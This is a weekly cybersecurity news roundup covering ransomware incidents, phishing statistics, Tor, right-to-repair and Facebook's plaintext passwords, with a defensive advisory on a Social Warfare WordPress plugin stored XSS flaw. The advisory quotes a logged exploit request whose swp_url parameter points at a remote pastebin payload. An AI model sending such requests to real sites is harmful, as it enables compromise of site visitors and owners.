This Week in Security News: Radio Frequency Technology and Telecom Crimes

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how radio frequency technology is putting industrial organizations at risk. Also, understand the threat landscape of telecommunications and how to prepare for future threats.

Police Federation Breach

It has been reported that the Police Federation of England and Wales (PFEW) has confirmed that it has been dealing with a ransomware attack on its computer systems. The PFEW was able to respond quickly to an alert from its cyber-security n Saturday 9th March, with cyber experts rapidly reacting to isolate the malware to stop it from spreading to PFEW branches. 

Vulnerability Assessments Versus Penetration Tests: A Common Misconception

X-Force Red is an autonomous team of veteran hackers within IBM Security that is hired to break into organizations and uncover risky vulnerabilities that criminal attackers may use for personal gain. Our team recently unveiled new statistics collected from its penetration testing engagements. One statistic that stood out, although not surprisingly, was that out of 1,176 phishing emails sent to employees within five organizations from October 2017 to November 2018, 198 people clicked on the malicious link inside the email and 196 people submitted valid credentials.

Security Of Enterprise Wireless Networks

Providing enterprise network security is becoming an increasingly complex undertaking, as the number of threats emanating from the Internet continues to grow. Hackers continue to find new ways to attack systems and steal data. Dealing with these threats is highly complex. While numerous reviews like this may indicate that virtual private networks can protect you against all threats, getting on top of enterprise network security is much more difficult.

Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

Grandson of legendary John Deere engineer defends right-to-repair and condemns Big Ag for “taxing customers”

Willie Cade’s grandfather Theo Cade was one of John Deere’s most storied engineers, with 158 patents to his name; he invented the manure spreader and traveled the country investigating stories of how farmers were using, fixing, modifying and upgrading their equipment; today, Willie Cade is the founder of the Electronics Reuse Conference, having spent a quarter-century repairing electronics, diverting e-waste from landfills and rehabilitating it for use by low-income schools and individuals.

Behind the Scenes of Onion Services

In this article, we discuss how the domain name of the services in the Tor network are set and what security risks they may pose. We examine a study from Princeton University concerned with the habits of Tor users in order to determine the potential impacts of security risks.

Norsk Hydro’s Ransomware Headache

The latest edition of the ISMG Security Report discusses the recent ransomware attack on aluminum giant, Norsk Hydro. Plus, confessions of a former LulzSec and Anonymous hacker, and the growing problem of cyber extortion.

Readout from Secretary Nielsen’s Trip to Texas

Secretary of Homeland Security Kirstjen M. Nielsen traveled to Austin, Texas, where she delivered remarks at the International Association of Chiefs of Police (IACP) Midyear meeting between heads of state police agencies, police chief associations, and midsize agencies.

Zero-Day Stored XSS in Social Warfare

Exploitation Level: Easy / Remote

DREAD Score: 7.2

Vulnerability: Stored XSS

Patched Version: 3.5.3

A zero-day vulnerability has just appeared in the WordPress plugin world, affecting over 70,000 sites using the Social Warfare plugin.

The plugin is vulnerable to a Stored XSS (Cross-Site Scripting) vulnerability and has been removed from the plugin repository. Attacks can be conducted by any users visiting the site.

A patch has been released and users are advised to update to version 3.5.3 as soon as possible.

What Is It All About?

The vulnerable code is contained within some of the plugins debugging features. These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability.

A fully working PoC is available in the wild and we expect the number of exploit attempts to grow in size in the coming days.

Indicators of Compromise:

You can look for requests pointing to any PHP file /wp-admin/ with the following parameters in your access logs:

  • swp_debug
  • swp_url

Exploits in the wild

We are seeing a lot of exploit attempts in the wild from more than a hundred different IPs.

202.254.236.49 - - [21/Mar/2019:16:52:14 -0400] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf HTTP/1.1" 403 2669 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

Facebook Password Security Fail

Facebook is facing scrutiny once again today by disclosing that it accidentally stores “hundreds of millions” user passwords in plaintext. To make matters worse, 20,000 Facebook employees had access to view these passwords. Instagram users are also impacted by this massive oversight.